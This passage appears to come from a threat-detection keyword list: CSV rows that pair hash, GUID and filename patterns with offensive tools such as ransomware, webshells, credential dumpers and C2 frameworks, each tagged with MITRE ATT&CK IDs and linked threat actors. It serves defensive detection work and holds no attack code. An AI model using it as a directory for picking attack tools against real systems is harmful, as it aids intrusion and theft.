"*D1C2F2133FF88AEE3A302ABB828198F12C075847297604D3A1AF8CD5E91645B5*",".{0,1000}D1C2F2133FF88AEE3A302ABB828198F12C075847297604D3A1AF8CD5E91645B5.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39463" 
"*d1c7ff29ca273c6d90c5607f57a7788c3f5e569bc2c2863edcde5f2653bbde81*",".{0,1000}d1c7ff29ca273c6d90c5607f57a7788c3f5e569bc2c2863edcde5f2653bbde81.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39465" "*D1CCDA5D-E460-4ACC-B51A-730DE8F0ECF3*",".{0,1000}D1CCDA5D\-E460\-4ACC\-B51A\-730DE8F0ECF3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39466" "*d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a*",".{0,1000}d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39467" "*d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f*",".{0,1000}d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39468" "*D1D4BB1C-798D-47B0-8525-061D40CB9E44*",".{0,1000}D1D4BB1C\-798D\-47B0\-8525\-061D40CB9E44.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","39469" "*d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5*",".{0,1000}d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#filehash","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","39470" 
"*d1d533085ee36aee9b817636d6ed5323da22461af7de88b016484610531c6f0e*",".{0,1000}d1d533085ee36aee9b817636d6ed5323da22461af7de88b016484610531c6f0e.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","39471" "*d1d579c00e86fb281fe7dab503014ecdf9777d85bd9ce50b079a221f344c0ab9*",".{0,1000}d1d579c00e86fb281fe7dab503014ecdf9777d85bd9ce50b079a221f344c0ab9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39472" "*d1d6193bb15e21797e9e976ffb5aff8f8edc4fc90cccb4667fcf0cb168073ae8*",".{0,1000}d1d6193bb15e21797e9e976ffb5aff8f8edc4fc90cccb4667fcf0cb168073ae8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39474" "*d1d808c69e803b797745a4bd963e44aa1f0ec16edbc721114867d9ef02f0a94d*",".{0,1000}d1d808c69e803b797745a4bd963e44aa1f0ec16edbc721114867d9ef02f0a94d.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense 
Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","39475" "*d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8*",".{0,1000}d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","39476" "*d1e05f79d0b0643b230fbbde69607d9ce4f20b8f19a8c47a91bf8beeb50ea147*",".{0,1000}d1e05f79d0b0643b230fbbde69607d9ce4f20b8f19a8c47a91bf8beeb50ea147.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39478" "*d1e9bbf0fb621285de6ea7b4c2b3f8dc2a15d0e51639eafb8f2fb8aca47054e0*",".{0,1000}d1e9bbf0fb621285de6ea7b4c2b3f8dc2a15d0e51639eafb8f2fb8aca47054e0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39479" "*d1ecd1c7f986326c33be2f9d183e60855e769cfa763f94906c04deddb3d78756*",".{0,1000}d1ecd1c7f986326c33be2f9d183e60855e769cfa763f94906c04deddb3d78756.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39480" "*d1efc8919bbb55ea144e8b91203a43cec5ceda5ae68f1077836e1da06340f557*",".{0,1000}d1efc8919bbb55ea144e8b91203a43cec5ceda5ae68f1077836e1da06340f557.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39481" "*d1f2f22cdf96f4a71b8a859353a8ff4a27d4afd8f8849da5d6eed966c1cc72d3*",".{0,1000}d1f2f22cdf96f4a71b8a859353a8ff4a27d4afd8f8849da5d6eed966c1cc72d3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39482" "*d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f*",".{0,1000}d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","39483" "*d1f920a20dd3f630ec10f55c318d860023ec40d74545cc490479ea503583e0df*",".{0,1000}d1f920a20dd3f630ec10f55c318d860023ec40d74545cc490479ea503583e0df.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39484" "*d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1*",".{0,1000}d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39485" "*d1fb9e6003ccd810b6df1b2160dbbf6ab8b6daf81c4cbde95a31add2661a59e2*",".{0,1000}d1fb9e6003ccd810b6df1b2160dbbf6ab8b6daf81c4cbde95a31add2661a59e2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39486" "*d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14*",".{0,1000}d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","39487" "*D1rkInject.cpp*",".{0,1000}D1rkInject\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target 
process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39488" "*D1rkInject.exe*",".{0,1000}D1rkInject\.exe.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39489" "*D1rkInject.iobj*",".{0,1000}D1rkInject\.iobj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39490" "*D1rkInject.log*",".{0,1000}D1rkInject\.log.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","#logfile","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39491" "*D1rkInject.sln*",".{0,1000}D1rkInject\.sln.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - 
T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39492" "*D1rkInject.vcxproj*",".{0,1000}D1rkInject\.vcxproj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39493" "*D1rkInject-main*",".{0,1000}D1rkInject\-main.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39494" "*d201ba52fb577509eefe1e9e780fdcc45776a746ac6dbf913a315b34eb2134c7*",".{0,1000}d201ba52fb577509eefe1e9e780fdcc45776a746ac6dbf913a315b34eb2134c7.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39495" "*d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64*",".{0,1000}d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39496" "*D210570B-F1A0-4B66-9301-F7A54978C178*",".{0,1000}D210570B\-F1A0\-4B66\-9301\-F7A54978C178.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","#GUIDproject","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","39498" "*d2119d9dce199cab558514bb1de19a59b207a9d654d0ed1477fa2d98f20e3dc3*",".{0,1000}d2119d9dce199cab558514bb1de19a59b207a9d654d0ed1477fa2d98f20e3dc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39499" "*d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5*",".{0,1000}d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","39503" "*d21cf671b3547b844a9adbe858c032e02f68b5d475de06b92e7776cd79d9db27*",".{0,1000}d21cf671b3547b844a9adbe858c032e02f68b5d475de06b92e7776cd79d9db27.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common 
system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","39504" "*d21f5b2cbd06f1f679bcc65b7d40fc203c1f7008dac678f7edf14577d8c2246f*",".{0,1000}d21f5b2cbd06f1f679bcc65b7d40fc203c1f7008dac678f7edf14577d8c2246f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39505" "*d222451147be2256c701679975cd45993377032f1d6afff27533bafda10c2afa*",".{0,1000}d222451147be2256c701679975cd45993377032f1d6afff27533bafda10c2afa.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","39507" "*d22b0e65e8b92c408276652f2b344073684a77b5ce7bc21fda8a8b03f1f76495*",".{0,1000}d22b0e65e8b92c408276652f2b344073684a77b5ce7bc21fda8a8b03f1f76495.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39508" "*d240dc4fa0146d782dc43ff14fc47afb81080057a2843cd2ba679a7e6b2197aa*",".{0,1000}d240dc4fa0146d782dc43ff14fc47afb81080057a2843cd2ba679a7e6b2197aa.{0,1000}","offensive_tool_keyword","WinPwnage","various 
exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","39511" "*d243029c00185f99446544ba5bb34e6c3002edd90603f4dbff8e2070c207e80c*",".{0,1000}d243029c00185f99446544ba5bb34e6c3002edd90603f4dbff8e2070c207e80c.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39512" "*d24b17b869e71fde4c815978397d4764bf749e71f20dd1e6f2386fd0bad6b660*",".{0,1000}d24b17b869e71fde4c815978397d4764bf749e71f20dd1e6f2386fd0bad6b660.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39513" "*D24C50F9C1F0E6AC82157B0319127ECF72E454FE5A9E86C25891B3101F957769*",".{0,1000}D24C50F9C1F0E6AC82157B0319127ECF72E454FE5A9E86C25891B3101F957769.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","39514" 
"*d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980*",".{0,1000}d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","39515" "*d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77*",".{0,1000}d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39516" "*d256cc182755382453baf24b8f8c328104a0e65f51e236cc7acd52fa2e238534*",".{0,1000}d256cc182755382453baf24b8f8c328104a0e65f51e236cc7acd52fa2e238534.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39518" "*d26f0536e66e9973021e728b5803d7ddeeb07f0fc4e4e1382dbda6384718cf37*",".{0,1000}d26f0536e66e9973021e728b5803d7ddeeb07f0fc4e4e1382dbda6384718cf37.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39521" "*d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee*",".{0,1000}d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39523" "*d2807b9860e0e4801cd00f45421b5bcab30c1a818f193e4a3d33be8f65c99ea0*",".{0,1000}d2807b9860e0e4801cd00f45421b5bcab30c1a818f193e4a3d33be8f65c99ea0.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#filehash","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","39524" "*d2883841250ba0c96ce0e4095a612f0dd2c4419bb7e32f4873ac9da0c1053554*",".{0,1000}d2883841250ba0c96ce0e4095a612f0dd2c4419bb7e32f4873ac9da0c1053554.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","39526" 
"*d2888f1714566be066719ca2bcbe9e5948a002a7f12070397b306e96442c26aa*",".{0,1000}d2888f1714566be066719ca2bcbe9e5948a002a7f12070397b306e96442c26aa.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","39527" "*d28ac4233d53079b9f57c3dd15c024feaaffd407b26568da298c87c5d563c60c*",".{0,1000}d28ac4233d53079b9f57c3dd15c024feaaffd407b26568da298c87c5d563c60c.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","39528" "*d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01*",".{0,1000}d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39529" "*d28c06d99ec09ac090e9b16340daff7765f1257eea94383aa67ad1f9bf0a928c*",".{0,1000}d28c06d99ec09ac090e9b16340daff7765f1257eea94383aa67ad1f9bf0a928c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
